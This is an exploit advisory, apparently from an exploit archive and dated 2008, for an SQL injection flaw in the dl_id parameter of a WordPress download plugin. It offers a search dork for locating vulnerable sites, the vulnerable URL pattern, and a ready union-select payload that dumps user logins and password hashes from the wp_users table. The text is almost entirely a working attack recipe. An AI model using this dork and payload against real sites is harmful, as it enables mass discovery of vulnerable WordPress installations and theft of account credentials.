id: 2789
date: 03/30/2008
title: Wordpress Plugin Download (dl_id) SQL Injection Vulnerability
author: BL4CK
cves: 

=============================================================
Wordpress Plugin Download (dl_id) SQL Injection Vulnerability
=============================================================



###############################################################
#
# Wordpress Plugin Download file Remote SQL Injection Vulnerability
#
###############################################################
#
# Author: BL4CK
#
################################################################
#
# Dork: inurl:"wp-download.php?dl_id="
#
################################################################
Example:
http://localhost/[path]/[path]/[path]/wp-download.php?dl_id=[SQL]
SQL:
null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*
################################################################



#  0day.today [2023-03-23]  #